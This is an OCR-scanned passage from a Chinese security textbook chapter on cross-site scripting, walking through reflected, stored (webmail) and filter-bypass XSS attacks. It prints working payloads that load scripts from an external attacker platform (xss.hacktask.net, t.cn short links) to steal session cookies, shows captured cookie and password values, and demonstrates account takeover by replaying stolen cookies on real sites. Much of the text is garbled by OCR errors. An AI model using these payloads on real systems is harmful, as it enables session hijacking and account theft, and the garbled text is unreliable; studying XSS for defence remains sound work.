由 于 浏览 器 默认 协议 为 http， 对 应 的 默认 端口 号 为 80， 故 可 以 省 略 。 但 如 果 要 访问 互 
联网 上 的 其 他 资源 ， 则 需要 加 上 协议 名 ， 如 ftp://。 

相应 地 ， 了 解 网 站 内 的 路 人 符 和 参数 也 非常 重要 ， 例 如 网 址 末尾 常见 的 /.../asp?id=x 就 是 
将 x 作 为 参数 id 的 内 容 传 入 页 面 ， 有 兴趣 的 读者 不 妨 再 去 了 解 一 下 http 请 求 、get 方 法 和 post 
方法 ， 这 些 都 是 很 有 必要 的 。 


62 了解 XSS 攻 击 


6.2.1 XSS 攻 击 原 理 


有 了 必要 知识 的 准备 ， 就 可 以 开始 了 解 现今 互联 网 中 最 难以 完全 防御 ， 也 是 和 人 的 
交互 度 最 高 的 攻击 方法 一 一 XSS (Cross-Site Scripting) 攻击 了 。XSS 即 跨 站 脚本 攻击 ， 其 
原理 就 是 通过 存在 的 漏洞 网 站 欺骗 用 户 在 当前 域 执行 黑客 提前 设计 好 的 恶意 JavaScript 脚 
本 ， 这 些 脚 本 往往 会 在 不 经 意 间 就 让 用 户 的 浏览 器 执行 了 自己 不 期 望 发 生 的 动作 ， 有 时 用 
户 发 现 这 些 恶意 动作 后 会 咨询 为 什么 会 中 招 。 某 些 “计算 机 高 手 ” 或 许 会 告诉 他 “一 定 
下 载 了 带 有 病毒 的 软件 ”。 然 而 事实 未 必 如 此 ， 即 使 不 用 恶意 软件 ，XSS 也 可 以 达到 一 些 
相仿 的 作用 ， 这 在 接 下 来 的 章节 中 将 会 详细 展示 。 


622 XSS 攻 击 的 分 类 


通常 意义 上 的 XSS 漏 洞 分 为 反射 型 和 储存 型 两 种 类 型 。 

反射 型 XSS 通 常 借 URL 传 参 的 方式 将 恶意 内 容 传 入 当前 页 面 以 触发 黑客 设计 的 
JavaScript 脚 本 ， 且 打开 链接 的 用 户 即 会 成 为 受害 者 ， 而 储存 型 则 是 通过 POST 请 求 等 方法 
将 恶意 参数 持久 地 提交 进 一 个 页 面 中 ， 故 又 被 称 为 持久 性 XSS。 存 储 型 XSS 的 数据 是 储存 
在 服务 器 上 的 。 

很 多 地 方 喜 欢 把 DOM XSS 也 作为 一 种 XSS 类 型 ， 事 实 上 ， 这 种 类 型 从 效果 上 来 说 也 
是 反射 型 XSS， 但 由 于 发 现 它 的 安全 专家 把 它 单独 作 为 一 个 分 类 ， 所 以 第 被 单独 拿 出 来 。 

先 来 看 一 下 反射 型 XSS， 这 里 以 一 个 名 为 web Гог pentester 的 实验 镜像 进行 演示 ， 读 
者 可 以 前 往 这 个 实验 镜像 的 官方 网 站 (http://pentesterlab.com/exercises/web for pentester/ ) 
下 载 最 新 版 本 的 镜像 并 在 虚拟 机 里 安装 实验 。 这 里 选择 的 虚拟 机 软件 是 VMware 
Workstation， 安 装 方法 不 再 芍 述 。 

虚拟 机 安装 完成 后 将 会 看 到 如 图 6-7 所 示 的 界面 。 
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这 里 还 使 用 刚才 的 实验 平台 ， 这 一 次 提交 的 恶意 参数 如 下 ， 如 图 6-19 所 示 。 


<script src=" http://xss.hacktask.net/ECINmP21415258770 ></script> 


ФО XSS Platform x Ж http://xss.h..21415258770 х / ©’ pentesterLab > Web Юг... х 


є  192.168.101.144/х5<5/ехатріе1.рҺр?пате- <script згс Һр://хѕѕ.Һаскаѕк.пеЕС1№тР?1415258770> </5 


ноте 


Hello 
@ PentesterLab 2013 


图 6-19 ”执行 payload 测 试 
插入 恶意 参数 并 按 回 车 键 以 后 ， 会 看 到 加 载 的 小 圆圈 多 转 了 一 会 儿 后 停止 了 ， 这 是 因 
为 提交 的 JavaScript 脚 本 已 经 被 执行 ， 可 以 使 用 Firebug 来 查看 一 下 执行 情况 ， 如 图 6-20 所 示 。 


# У < у У= je | HTML” CSS ВЖ ПОМ м Cookies 
о | 编辑 | body < html 


В <div class=“ “navbar navbar-inverse naybar-fixed-top > 
[Z] <div class=" container” 
Hello 
国 <script src=“”“http://xw=ss.hacktask. пеї/ЕС1МшР?1415258770°> 
(function() {{new Image ()). src= http://xss. hacktask. net/index. php?d 
2 | iff 1 =1) {keep=new Ішағе () ;кеер. src= http://xss. hacktask. пеё/іпӣє 
‚таг xss = Ешс#10п() { 


图 6-20 Firebug 查 看 界面 
不 难看 出 ， 外 部 脚本 已 经 被 加 载 ， 这 时 再 访问 该 平台 会 看 到 已 经 成 功 地 支持 了 受害 者 
的 信息 ， 如 图 6-21 所 示 。 


项 目 名 称 : test 


ар пр: //хев.Паскгавк.пе?/до/аи /7ае12а84с0883а1 07Б596саБа0йвазз#? 


图 ”+ 全 部 5 接收 的 内 容 Request Headers 

HTTP_REFERER : 

location : http://192.168.101.144 http://192.168.101.144 

/хвз/ехатр!е1 .рбр?пате=%3С5сйр{% 205го®8йвхатр!е1.рбр?пате=%3С5спйрЕ%205гс 
/{xss.hacktask.net/EC1INmMmP? 1415258770 //xss.hacktask.net 

%3Е%3С/зспрЕ%3ЗЕ [ЕС1МтР? 1415258770%3Е%3С 

toplocation : ћїЕр://192.168.101.144 /script%3E 


Ш -j 2014-11-06 15:37:40 т/ҙ 


/хвз/ехатіріеі.рһр?пате-%оЭСэстір(9%205гс-ЕПІРрі)БЕНК АСЕМТ ; Mozilla/5.0 


//х$5.Пасктазк.пеу/ЕС1МтР? 1415258770 (Windows МТ 6.1; WOW64; 


%3Е%3С/5сПрЕ%3Е гу:32.0) сеско/20100101 

cookle ， Flrefox/32.0 

opener : КЕМОТЕ_АООК : 
114.222.130.3, 54.178.75.106 


86-21 动 持 信息 
因为 平台 并 没有 给 用 户 发 放 cookie， 所 以 这 里 的 cookie 项 为 空 ， 但 是 实战 中 它 往 往 是 
一 大 串 字 符 ， 通 过 劫持 到 的 用 户 cookie， 可 以 用 浏览 器 插件 替换 原 有 cookie 并 绕 过 登录 上 账 
户 和 密码 直接 进入 受害 者 在 当前 网 站 的 账户 ， 下 面 的 章节 将 会 有 实例 演示 。 
不 过 ， 在 讲解 接 下 来 的 内 容 之 前 ， 必 须 介 绍 另 外 一 种 前 端 安全 技术 一 一 CSRF， 在 很 
多 真实 场景 下 ，XSS 和 CSRF 的 结合 使 用 将 会 得 到 意 想 不 到 的 收获 。 
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} 

«Узстіріс> 

代码 并 没有 经 过 仔细 设计 ， 但 却 大 致 勾勒 出 了 一 个 蠕虫 的 模型 ， 从 私信 和 点 进 恶 总 网 址 
的 人 会 触发 很 多 个 恶意 网 址 ， 进 而 危害 到 每 一 个 好 友 。 这 样 的 传播 速度 是 无 法 估量 的 ， 已 
经 无 法 直观 感知 ， 只 能 用 更 为 精确 的 数学 模型 来 描述 一 一 指数 爆炸 型 增长 。 

再 设想 ， 假 设 目 标 站 扣 还 同时 存在 XSS 漏 洞 ， 一 旦 和 CSRF 蜂 虫 结合 使 用 ， 成 干 上 万 
的 受害 者 就 将 会 遇 到 更 大 的 麻烦 了 。 


64 ”实战 案例 演示 
Ж: 本 节 所 提 到 的 所 有 漏洞 均 已 修复 。 
6.4.1 一 个 导致 网 站 沦陷 的 反射 XSS 
下 面 演示 一 个 很 标准 的 反射 XSS 示 例 。 


在 站 点 地 址 栏 提 交 了 <script>prompt(1)</scrip 仿 后， 那个 prompt 对 话 框 就 弹 了 出 来 ， 如 
图 6-22 所 示 。 


图 6-22 存在 XSS 

既然 存在 XSS 漏 洞 ， 那 么 恶意 黑客 就 可 以 构造 cookie 劫 持 的 恶意 链接 ， 并 将 这 个 链接 
伪装 后 发 给 站 长 ， 站 长 单 击 后 ， 正 处 在 后 台 登 录 状 态 的 cookie 被 截获 ， 通 过 伪造 的 cookie 
顺利 垂直 提 权 ， 就 可 以 进一步 getshell 提 权 服 务 器 了 。 

思路 已 经 有 了 ， 然 而 目的 并 非 渗透 这 个 站 点 ， 而 是 测试 展示 cookie 动 持 的 利用 方法 ， 所 以 
并 没有 再 去 招惹 站 长 的 必要 ， 这 里 就 用 一 次 简单 的 水 平 越权 来 展现 cookie 动 持 技 术 的 作用 。 

所 谓 的 水 平 越权 ， 其 实 就 是 在 同样 的 权限 下 ， 访 问 其 他 用 户 的 空间 ， 使 用 不 属于 目 己 
的 权限 。 为 了 展示 ， 笔 者 注册 了 两 个 账户 ， 并 在 火狐 和 Chrome 浏 览 器 分 别 登录 ， 以 模拟 
黑客 和 受害 者 ， 因 为 法 律 问题 ， 且 本 站 点 涉及 充值 等 敏感 信息 ， 请 不 要 把 其 他 合法 用 户 作 
为 实验 目标 。 

笔者 创建 了 两 个 账户 ，testxss 将 会 模拟 受害 者 ， 而 xxetest 则 是 黑客 的 账号 ， 如 图 6-23 所 示 。 
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АМ 


ANUS жөзженжіе, 


Q 搜索 testxss 充值 | 我 的 博客 | 退 Q 搜索 xxetest | 充值 | 我 的 博客 | 


; 仙 侠 搞笑 武侠 历史 Ш 手机 听 = зи да 历史 БЕЗІ! 


图 6-23 ”测试 账号 


现在 重新 审视 一 下 反射 XSS 的 所 在 并 设计 恶意 链接 ， 其 exploit 如 下 。 

http: .com/search.aspx?keyword= [ XSS к] 

由 于 <scrip 亿 标签 没有 过 滤 ， 各 种 符号 也 几乎 没 作 限制 ， 所 以 可 以 很 目 由 地 用 <script 
sTc=xxx></script> 来 加 载 外 部 JS 脚本 ， 最 终 的 恶意 链接 如 下 。 

http: .com/search.aspx?keyword=<script src=http://xss.hacktask.net/ 
ECI1NmP?1415264855></script> 

当 testxss 用 户 打 开 这 个 链接 时 ， 他 所 感受 到 的 也 许 只 是 网 页 加 载 慢 了 一 些 ， 他 所 看 到 


的 页 面 将 会 如 图 6-24 所 示 。 


€ XSS Platform 


0714 3 52548 


те 言情 官场 评书 яма 


图 6-24 XSS 实 际 已 被 触 发 
他 却 海 然 不 知 目 己 已 经 中 了 黑客 的 圈套 。 
再 来 看 看 我 们 的 平台 ， 如 图 6-25 所 示 。 


-anklehttp://xss.hacktask.net/do/auth/7ael12a8dc0883a107bd6caba06d33If7 


图 6-25 ”接收 到 窃取 的 信息 
不 难看 出 ， 框 出 的 部 分 便 是 支持 到 的 cookie， 我 们 把 内 容 复制 到 一 个 空白 的 记事 本 
中 ， 如 图 6-26 所 示 。 


| cookie.txt - 记事 本 
VHA SSE) 120) SEV) #EBh(H) 


Нтю_1у1_293е647867аб2449474еғаі 4562есҒетї=1414904491, 1414904604, 1415241435, 14 
15263266; аз а! иу-31031825973791672107 |3486570; 


Hm_lpvt_ 293e6478b7a6244947defd14562ecfe7= 1415264740; 
1zstat_ss=338967590 2 1415293540 3486570; m етаі1=с=50г5%40163. соп; 
п раѕэхог4=Е721060000000000%2с1еку01 ҒЕѕуѕг511 аххреор4еа; 


6-26 соокіе/& Ë 
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如 果 读 者 觉得 这 样 看 起 来 很 乱 的 话 ， 不 妨 写 一 个 简单 的 Python 脚 本 整理 一 下 ， 立 刻 就 
会 清爽 很 多 ， 如 图 6-27 所 示 。 


УКР жав (О) заем ЖЕН) 


Hm 1у+_293е6478Ь7а6244947 4еҒа1 4562есҒе7=1414904491, 1414904604, 
1254аї_цу=31031825973791672107 |348657 


70 
Нт іруі 293е647857а62449474еҒ414562есГеТ7-14 
1zstat_Ss=338967590 2. се. 3486570 грати 记事 本 


m_email=cssors%40163. с 
m password=F721060000000000%2c1eky0i ffsv 


|| ЕР) Е) “格式 (O) 


Hm lyt 293е6478ЬТ7аБ2 
15263266: lzstat_u 


lzstat _ss=338967590 
п раззиог4-Е 72106000 


УКР ”编辑 (E) ЖОО) заем) RH) 
А = ореп(“соокіе. txt”, г”) 
= ореп( result. txt”, w ) 


1 п 
В. кей. ѕїгір(')) 


print С 
86-277 ”用 Python 脚本 整理 cookie 信 息 
既然 黑客 已 经 拿 到 了 受害 者 的 cookie， 他 现在 要 做 的 就 是 把 这 个 cookie 蔡 换 进 浏览 器 
里 。 有 很 多 工具 都 可 以 实现 这 个 功能 ， 甚 至 是 在 火狐 浏览 器 下 如 果 不 想 用 Firebug， 用 Fire 


cookie 插 件 同 样 可 以 完美 地 完成 任务 ，Chrome 浏 览 器 的 插件 Edit This Cookie 也 是 一 样 优 
秀 ， 这 里 我 们 选用 它 来 蔡 换 ， 如 图 6-28 所 示 。 


Xk “РАО” Е де Еди This Cookie 了 ， 单 击 它 ， 看 一 看 界面 ， 如 图 6-29 所 示 。 


@ 5 + + ® Q £ 
<от | Hm_Ipvt_293e6478b7a6244947defd14562ecFfe7 


сот | Hm_lvt_293e6478b7a6244947defd14562ecfe7 


сот | lzstat_ss 
<от | lzstat_uv 
‚сот | m_email 
„сот | m_password 
<от | nickname 


~ СТ | ьазпаге firstime 


1414070662413 


路 径 
Г 


= % 


ЗЗР] 
ЕШ 0/2022 09:30 РМ 


 —— Ç hostOnly у 


图 6-28 ЕФ! This Cookie 插 件 


86-29 ”查看 cookie 信 息 


可 以 看 到 ，Edit This Cookie 插 件 已 经 把 当前 用 户 的 cookie 一 一 列举 出 来 ， 攻 击 者 只 需 
要 把 对 应 的 值 ， 也 就 是 刚刚 “和 镭 取 ”到 的 cookie 对 应 地 填 进 去 即 可 。 
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填写 完毕 后 刷新 页 面 可 以 看 到 ， 攻 击 者 已 经 成 功 登 录 进 受害 者 的 账户 了 ， 如 图 6-30 
HIZR o 


testxss | 充值 | 我 的 博客 | 退出 @ от y 


_ 手机 听 书 “党 上 传 音频 
作家 合作 畅 听 记 月 
5 ЛХ НН 儿童 英语 评书 曲艺 搞笑 ща НУ 探索 


图 6-30 ”伪造 cookie 登 录 成 功 


642 精确 打击 : 邮箱 正文 XSS 


南京 大 学 近 两 年 曾 有 一 名 “黑客 ”在 网 上 发 帖 称 : “通过 入 侵 老 师 邮箱 获取 考卷 以 及 
修改 考试 成 绩 ”。 这 个 事件 引起 了 轩然大波 ， 社 会 舆论 和 盲目 的 崇拜 者 席卷 而 来 ， 这 位 仁 
兄 因 此 也 红 极 一 时 。 实 际 上 ， 他 所 用 的 技术 也 正 是 XSS， 他 还 指出 ， 很 多 学 校 邮 箱 系 统 都 
存在 此 类 问题 ， 这 也 印证 了 XSS 广 泛 存 在 这 一 事实 。 这 里 就 带 大 家 揭秘 他 究竟 是 如 何 入 侵 
老师 邮箱 的 。 

邮箱 类 的 XSS 就 像 是 精确 制导 武器 ， 制 造 好 的 导弹 非常 精确 地 攻 回 受害 者 ， 而 这 些 
导弹 也 分 优 劣 ， 优 质 的 如 正文 储存 型 XSS， 命 中 率 极 高 ， 也 能 很 大 几率 地 “光荣 完成 任 
务 ”。 这 里 介绍 一 个 这 样 的 邮箱 XSS， 为 了 不 使 复杂 的 bypass 绕 尝 读 者 ， 这 里 我 们 找到 了 
一 个 过 滤 不 严谨 的 邮箱 提供 商 进行 测试 。 


= 无 限 邮 lualualua <ualuaua@2925.corc w 
U азам | RA 


ТЕН, чаташа 


Ы 邮件 ; 0 ЕН 


妈妈 再 也 不 司 用 无 限 邮 账号 
我 忘记 帐号 了 ! 邮箱 将 会 帮 你 记 住 曾 


& ва + 
6-31 邮箱 XSS 测 试 目标 

初步 审视 这 个 邮箱 系统 ， 看 上 去 清 清 爽 爽 ， 似 乎 和 网 易 、QQ 邮 箱 等 并 无 两 样 。 然 而 
安全 性 是 否 也 如 此 呢 ， 人 简单 测 试 一 下 便 可 知晓 。 

登录 一 个 163 邮 箱 作为 发 件 账 号 ，lualualua@2925.com 则 作为 被 测试 账号 ， 先 按 如 下 的 
方法 发 送 一 封 邮件 。 

先 在 正常 编辑 状态 随意 写 下 一 个 字符 串 ， 如 test123， 插 入 这 个 字符 串 的 目的 是 方便 在 
收 件 页 面 调试 时 定位 ， 后 面 会 看 到 ， 然 后 输入 “< >” 编 辑 HIML 人 代码。 先 测试 一 句 经 典 
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的 payload 语 句 : <script>alert(1)</script>, 16-32977. 
这 是 编辑 后 的 语句 ， 编 辑 好 后 不 要 返回 文本 编辑 模式 ， 直 接 单 击 “ 发 送 ”按钮 。 
事实 证 明 ， 收 件 处 并 没有 弹 窗 ， 如 图 6-33 所 示 ， 用 Firebug 跟 踪 ， 通 过 刚才 输入 的 字符 
串 对 输出 进行 定位 。 


KHA : | lualualua@2925.com 


+ 89 : test 


内 添加 附件 (226) | У 邮箱 大 师 领 15G 云 附件 


М =Á „ +5 v 
~œ В 7 ОАА 
test123<script>alert(1)</script> 


发 件 人 : xxetest<xxetest@163.com> = 
时 ІН: 2014-11-06( 四 ) 18:53 
ША : lualualua<lualualua@2925.com> ; 


test123 


图 6-32 ”正文 payload 测 试 6-33 发 送 结 果 
如 图 6-34 所 示 ， 令 人 惊讶 的 是 <scrip 亿 标签 已 经 成 功 地 进入 页 面 却 并 没有 执行 。 这 时 
我 们 注意 到 这 样 一 行 代 码 : 


<html xmlns="http:/ /ww -ww3-.0rg/1999/xhtmal"> 


В ¿div style= 11пе-һе1 1:1. 7:со1ог 
1951123 
= ¿script? 


1 alert(i) 
¿/sceript> 


</ div> 
图 6-34 ”Firebug 定 位 输出 


由 此 可 见 ， 网 站 定义 了 需要 使 用 XHTML， 用 不 严谨 的 <script></script> 想 必 是 无 法 插 
入 了 ， 上 略微 修改 一 下 语句 ， 如 下 所 示 。 


<script type="text/javascript"> 
alert ("Hello Мог1а!"); 


</зсг1рЕ> 


再 次 发 送 ， 却 没 想 到 依然 无 法 触发 ， 如 图 6-35 所 示 。 


~ ха 

TIFA: xxetest<xxetest@163.com> = 

时 间 : 2014-11-07( 五 ) 11:51 

АД: lualualua@2925.com<lualualua@2925.com> ， 


XXXXXX 


图 6-35 发 送 结果 
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这 使 笔者 鼎 为 费解 ， 看 来 是 后 问 采 用 了 过 滤 ， 想 要 在 这 种 情况 下 绕 过 过 滤 十 分 困难 ， 
本 看 条 条 大 路 通 罗 马 的 原则 ， 尝 试用 事件 方式 触发 。 此 时 也 刚好 想到 了 一 个 有 趣 的 事件 属 
FE: onmouseout。 在 Ww3school 查 一 下 ，xhtml 的 确 支 持 这 个 属性 ， 对 它 的 摘 述 则 是 : 

当 鼠 标 指 针 移 出 茶 元 素 时 执行 脚本 。 

想必 大 多 数 用 户 如 果 打 开 邮 件 看 到 一 大 段 内 容 都 会 目 然 地 用 鼠标 指针 轻 轻 滑 过 它们 ， 
即使 是 在 不 经 意 间 ， 那 么 攻击 者 就 可 以 试看 构造 出 这 样 一 个 语句 : 

<b on mouseout=alert (1) >15 ВВ: ...... hahaha О Я </р> 


ВРА, ЖЖС 6-36. 


图 6-36 ”成 功 触 发 XSS 
从 图 6-36 可 以 看 到 ， 在 鼠标 指针 移动 到 文字 上 方 再 拿 开 的 瞬间 ，JavaScript 脚 本 被 触发 
了 ， 再 试 着 构造 cookie 劫 持 。 


<b onmouseout=s=createElement('script');body.appendChild(s);s. 


src='http://t.cn/R7EtYil';>lalalallalalalala</b> 


当 收 件 人 打开 邮件 并 将 鼠标 滑 过 攻击 者 设计 的 文本 内 容 后 ， 查 看 XSS 平 台 可 以 看 到 ， 
cookie 已 经 非常 顺利 地 落 入 我 们 平台 中 了 ， 如 图 6-37 所 示 。 


паех.аѕрх?рпопеогиѕегмате= 1 
cookie : ІодіпОѕегМате=тіа1ітіа1гтіг1; 
UploadKey= 
атокск В ки: 
07 13:03:08 cbvxEx72GI8fZQKIYMUXBPJjkLCCCMCB9IIXTI3ŠG40L; 
ргеутай-Чдаеа5Ь95-119с- Дет 
4сЕа-9Е28-25050а33е81с: Е 
REMOTE_ADDR 
INFO_SI=r0Tx4OzHa0SBn7h7u0WRQpHZc2krHTSupOEUQDxmR3I 
INFO_CI=JSAbDfqkY99bxsPJD|G3qw==; Бр даа 


ІМҒО К1- АЗ37С71624Е82024685Е1Е94281007СЕ6 


图 6-37 查看 XSS 平 台 
6.4.3 一 次 简单 的 绕 过 ( bypass ) 演示 
在 上 面 的 内 容 中 ， 已 经 分 别 挑战 了 反射 和 邮箱 的 标准 语句 XSS， 却 还 没有 经 历 过 和 
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设置 过 过 滤 脚 本 的 XSS 输 入 点 。 可 是 当 杀 目下 手 去 挖掘 XSS 时 却 会 发 现 ， 大 多 数 可 以 编辑 
HTML 的 位 置 都 针对 JavaScript 的 执行 进行 了 过 滤 和 限制 ， 这 是 因为 XSS 现 今 也 已 经 引起 了 
各 大 厂商 的 注意 ， 并 努力 提升 安全 环境 的 成 果 。 然 而 有 些 情况 下 ， 纵 使 厂商 已 经 进行 了 过 
滤 ， 仍 然 可 以 通过 对 插入 语句 的 一 些 变形 绕 过 它们 。 下 面 台 来 看 一 个 反射 型 XSS 的 绕 过 ， 
也 就 是 bypass。 事 实 上， 除了 过 滤 脚 本 以 外 ， 还 有 一 些 功能 本 身 也 可 能 构成 障碍 ， 正 如 下 
面 将 要 演示 的 一 例 。 

当 怀 疑 页 面 处 存在 XSS 输 入 点 时 ， 笔 者 往往 会 先 提 交 一 个 <br>123<br> 来 得 看 是 否 能 
插入 大 于 号 和 小 于 号 。 如 果 可 以 ， 那 么 XSS 成 功 的 布 望 就 只 能 寄托 于 被 输出 到 JavaScript 内 
的 参数 了 。 让 人 欣慰 的 是 ， 此 处 并 没有 过 小 大 于 号 小 于 号 ， 可 以 看 到 ， 输 出 已 经 错位 了 。 
而 反映 型 XSS 中 ， 没 有 过 滤 尖 括号 就 意味 看 成 功 了 80%， 如 图 6-38 所 示 。 

该 网 站 并 没有 过 滤 尖 括号 ， 接 下 来 可 以 进一步 测试 了 ， 先 插入 一 条 测试 语句 : 
<script>alert(1)</script>。 

结果 出 现 了 如 图 6-39 所 示 的 页 面 ， 那 么 是 不 是 意味 看 此 处 没有 XSS 输 入 点 的 存在 呢 ? 
答案 显然 是 否定 的 。 


KEF 
HEM. 
ABRET, SERBIT 或者 зае 
图 6-38 检测 是 否 过 滤 尖 括号 图 6-39 ”插入 测试 


继续 测试 ， 提 交 一 个 正常 参数 后 看 页 面 返回 情况 ， 如 图 6-40 所 示 。 

没有 问题 ， 这 说 明 搜 索 功 能 不 存在 设计 错误 ， 下 面 就 应 当 思 考 一 下 是 哪个 ， 或 者 哪些 
语句 触发 了 错误 呢 ? 首先 怀疑 的 目 然 是 <scrip 亿 标签， 这 里 把 它 换 反 ， 用 <marquee> 标 签 来 
代替 ， 看 看 搜索 结果 如 何 〈 见 图 6-41) 。 


坎 访 问 的 页 面 不 存在 ， 点 击 这 里 返回 百 页 或 者 бФОЙЕЫСӘКЗ?ЕГІ. 


图 6-40 ”提交 正常 参数 86-41 标签 测试 

没 想 到 <marquee>123</marquee> 居 然 也 被 过 滤 掉 了 ， 如 果 对 <marquee> 标 签 都 进行 了 
过 滤 ， 这 个 过 滤 脚 本 就 有 点 犀利 了 。 但 笔者 仔细 一 想 ， 单 标签 <br> 的 插入 毫 无 问题 ， 兴 
许 是 斜 杠 导致 了 过 滤 ， 当 然 ， 除 此 以 外 (0) 的 嫌疑 也 还 没有 排除 ， 所 以 可 以 尝试 分 别 插 入 测 
试 ， 插 写 果然 导致 了 过 小， 再 次 看 到 如 图 6-42 所 示 的 页 面 。 
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您 访问 的 页 面 不 存在 ,点击 这 里 返回 首页 或 者 ВЕЗЕТ, 
图 6-42 语句 被 过 滤 

可 是 使 用 <marquee> 插 入 的 时 候 并 没有 括号 ， 而 事实 证 明 ， 单 独 插 入 冬 杠 或 者 插入 
/test 却 并 没有 引起 错误 ， 如 图 6-43 所 示 。 


Wsearch//test/ 


4 В. 


п 业 移动 互联 网 ный ”电子 商务 БЕ 


搜索 结果 БЕШЕ а, 


相关 搜索 


„ £: 
=a 


,新闻 资 读 | 
图 6-43 ”检测 和 斜 杠 是 否 过 渡 
这 让 笔者 的 思路 一 顿 ， 但 立刻 又 开明 起 来 ， 可 以 看 出 ， 这 里 提交 的 斜 杠 似乎 被 当 作 做 
目录 中 的 和 斜 杠 处 理 了 ， 再 插入 test/test， 果 然 如 此 ! 
既然 这 样 ， 不 妨 插 一 个 不 使 用 和 斜 杠 的 单 标签 来 触发 XSS， 婚 然 无 法 用 <script>， 就 只 
好 用 HTML 的 事件 属性 了 。 这 时 笔者 又 想到 一 个 问题 ， 插 号 无 法 处 理 。 这 里 为 何 会 过 滤 括 
号 呢 ? 笔者 有 些 奇 怪 ， 重 新 插入 了 一 个 (12) ， 没 想到 居然 没有 显示 404 界 面 ， 这 使 笔者 
备 受 鼓舞 ， 随 后 找到 了 一 个 不 带 有 和 斜 杠 的 XSS 语 句 : <img src=x опепог-айеп(1)>. 
这 里 的 src 属 性 赋值 为 x 目 然 会 出 错 ，onerror 事 件 检 测 到 这 个 错误 后 便 触发 了 后 面 的 
alert(1) 语 句 ， 经 过 测试 ， 果 然 成 功 了 ， 如 图 6-44 所 示 。 


в. 


图 6-44 ”成 功 触发 XSS 
不 过 现在 高 兴 还 太 早 ， 因 为 在 存在 障碍 的 情况 下 加 载 外 部 脚本 实现 cookie 劫 持 将 变 得 
更 为 困难 。 
先 来 整理 一 下 思路 。 
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现在 用 以 触发 JavaScript 语 句 的 环境 已 经 设计 好 了 ， 即 : 

һеер:// /search/<img src=X onerror=【 待 设计 的 Js 语句 >/ 

看 起 来 似乎 不 是 很 复杂 ， 因 为 原本 onerror 事 件 就 可 以 用 于 创建 节点 并 加 载 外 部 脚本 。 

<img src=xonerror=s=createElement( ' script '); body.appendChild(s); s.src= 你 的 JS 地 
НЕ"; > 

但 读者 应 该 也 意识 到 了 ， 如 果 想 要 标识 存放 在 网 络 上 的 外 部 脚本 ,在 引用 其 地 址 时 就 
一 定 会 用 到 /， 和 斜 杠 出 现在 标签 中 部 将 会 出 现 问题 ， 押 以 我 们 可 以 尝试 将 onerror 事 件 属 性 
后 的 JS 脚本 进行 十 六 或 十 进 制 编码 ， 最 终生 成 一 个 这 样 的 语句 。 


<img src=X опеггог=&#х73; &#х30;&#х63;&#х1712;&#х65;&#х61;&#х74;&#х65; 
&#х45; &#х6С; &#х65; «#хбО; &#х65; 6%Х6Е; &#х 74; &#х28;&#х217; «#х 73; &#х63;&#х72; 
6#х69; &#х 70; 6 #х 74; 6 #х2 7; «#х29; « #х3В; 6%Х62; «а #хбЕ; 6%Х64; 6 #х 79; «4 х2Е; &#х61; 
&#х70; «#х 70; &#х65; «#хбЕ; &#х64; 6 #х43; &#х68; &#х69; &#х6С; &#х64; &#х28; «#х 73; 
&#х29; &#х3В; «#х 73; &#х2Е; «#х 73; « #х 72; &#х63; &#х30; &#х27; &#х68; «#х 74; &#х74; 
&#х70; &#хЗА; &#х2Е; «#х2Е; «4 #х 74; 6%Х2Е; 6ЖХ63; &#х6Е; 6%Х2Е; «#хо2; 6 #х37; «#хо2; 
«#х62; «#х4С; «#х4С; 6 #х 74; 6 #х2 7; «#х3ЗВ; > 


这 样 编码 看 似 已 经 绕 过 了 斜 本 ， 然 而 却 遭 遇 
了 另外 一 种 不 幸运 ， 如 图 6-45 所 示 。 

这 个 错误 提示 页 面 再 次 出 现 ， 根 据 后 面 进 一 
步 测试 发 现 & 也 被 过 滤 了 ， 于 是 从 编码 方法 也 无 
从 下 手 了 。 


还 好 ， 安 全 的 世界 里 没有 绝对 ， 一 种 方法 的 ждат, AERDEN më 
失败 也 许 预示 看 另 一 种 方法 的 成 功率 的 增加 。 再 图 6-45 ”加 载 外 部 脚本 
尝试 用 JavaScript 方 式 对 和 斜 杠 转 码 来 bypass 吧 。 

根据 原先 的 指令 : 


<img src=x onerror=s=createElement ('script');body.appendChild (s); 


s.srce "http://t-cn/RIRGKw]"; > 


这 里 使 用 String.fromCharCode() 函 数 来 把 整个 URL 部 分 进行 一 个 变形 ， 将 http://t.cn/ 
R7RGKwj 转 换 为 String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 116, 46, 99, 110, 47, 82, 
55, 82, 71, 75, 119, 106): 的 形式 ， 因 为 在 JavaScript 运 行 时 ， 它 将 会 被 重新 变 回 原来 的 URL 
地 址 。 

这 样 一 来 就 顺利 了 ， 最 终 构 造 出 恶意 链接 地 址 。 


http://www. .сп/зеагс и /33С1та8205гс-х520опеггог-з-сгеаГеЕв!етеп 5828527 
зсгтрЕЗ2 7329; роду.аррепасһ114%285%29; 5. 5гс=51гіпд. ЁготсһагСойе%28104, 
115. 126. ПЕ ел Л, ЗУ ВАТУ о изка 
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当 受 害 者 打开 这 个 链接 以 后 ， 看 一 下 攻击 者 的 平台 ， 如 图 6-46 所 示 。 


РЕ 


body.appendCh 


s.src=String.fromCh: e%28104,116,116,112,58,47,47,116,46,99,110,47,82,55,82,71,75, 


торюсапоп : http://www | HTTP_REFERER : 
/search http://www - с /search 
do3CiMmgW20src=x%20o0nerror=s=createElejAeBCimg%20src=x%20o0nerror=s=createElement 
%28%275спрЕ%27%29; %28%275спрЕ% 27%29 
Боду.аррепасћіїа% 2859029; body.appendChild 
ЕЕ 5.згсъ5тппа.потспагсоде9о28104,116,116514/7,581 змия ате ла ФАР Ра повар 82161119, 
cookie : HTTP_USER_AGENT : Mozilla 
Нт |уі сЗЗедс1еб9еса76а2е522с20е5 3f6GAintitEd MISA ‚1 АБО 
tma=1.21217702 1415241451.14152496 А ПОВОНУЗЧА 00101 
_— utmz=1.1415241451.1.1.utmcsr= Firefo 
(aire сп=(д\гесї)|иттста=(попе); REMOTE_ADDR : 
uc=ae61b6451 2f6cbb2ff235326; 
Нт |руб сЗЗе4с1е69 76а2е522с20е5 3!6-1415 
= } 141 a 
7902b14984fbf868afc6603b; 


图 6-46 查看 XSS 平 台 
可 以 看 到 已 经 成 功 劫 持 到 的 cookie， 束 这 样 攻击 者 成 功 bypass 了 这 个 “有 矿 烦 ”的 反射 
型 XSS 。 


6.4.4 利用 XSS 进 行 钓 鱼 攻击 


XSS 漏 洞 原因 : ed2k 协 议 漏洞 ， 这 个 是 Discuz X3.1 前 版 本 的 漏洞 ， 漏 洞 成 因 将 会 在 
